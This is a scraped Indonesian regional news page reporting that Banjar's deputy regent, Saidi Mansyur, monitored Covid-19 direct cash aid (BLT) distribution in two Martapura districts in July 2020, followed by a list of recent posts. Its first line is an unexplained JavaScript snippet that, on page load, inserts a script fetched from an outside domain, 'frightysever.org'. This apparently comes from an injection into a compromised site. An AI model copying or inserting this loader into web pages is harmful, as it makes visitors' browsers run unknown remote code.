(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Banjar

Pantau dan Salurkan BLT, Ini Imbauan Wabup Banjar


KANALKALIMANTAN.COM, MARTAPURA – Bantuan Langsung Tunai (BLT) di tengah pandemi Covid-19 terus diserahkan oleh pemerintah daerah kepada warga yang berhak mendapatkan.

Seperti halnya pada penyaluran BLT di Kecamatan Martapura Timur dan Martapura Barat.

Wakil Bupati Banjar, H Saidi Mansyur, secara langsung memantau dan menyalurkan BLT.

“Alhamdulillah ulun meninjau kembali secara langsung penyaluran bantuan langsung tunai di dua Kecamatan, Martapura Barat dan Martapura timur.

Memang beberapa pekan terakhir ini, Ulun turun langsung ikut menyalurkan bantuan dari pemerintah,” ujar Saidi, Selasa (14/7/2020) sore.

Menurut dia, hal itu dilakukan semata-semata untuk melihat langsung kondisi masyarakat di tengah mewabahnya virus Corona dan memastikan bahwa bantuan yang digulirkan pemerintah ini benar-benar tepat sasaran kepada warga.

Mudah-mudahan, harap dia, dengan bantuan ini bisa meringankan beban masyarakat, terutama yang terdampak Covid-19 dalam menghadapi persoalan ekonomi.

“Ulun berharap bantuan ini bisa dimanfaatkan dengan baik dan benar untuk membeli kebutuhan hidup seperti sembako bukan disalahgunakan untuk gaya hidup,” katanya.

Dia juga mengingatkan kepada masyarakat agar selama pandemi Covid-19 untuk tetap menjalankan protokol kesehatan demi menghindari penularan Covid-19.

Masyarakat, lanjut dia, diharapkan dapat bekerjasama mematuhi imbauan pemerintah dan melaksanakan protokol kesehatan dengan selalu menjaga jarak, hindari kerumunan, memakai masker jika keluar rumah dan mencuci tangan sebelum masuk ke dalam rumah. (kanalkalimantan.com/dhani)

Reporter : Dhani
Editor : KK

Al Ghifari

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

1 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

3 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

4 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

5 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

8 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

11 jam ago

This website uses cookies.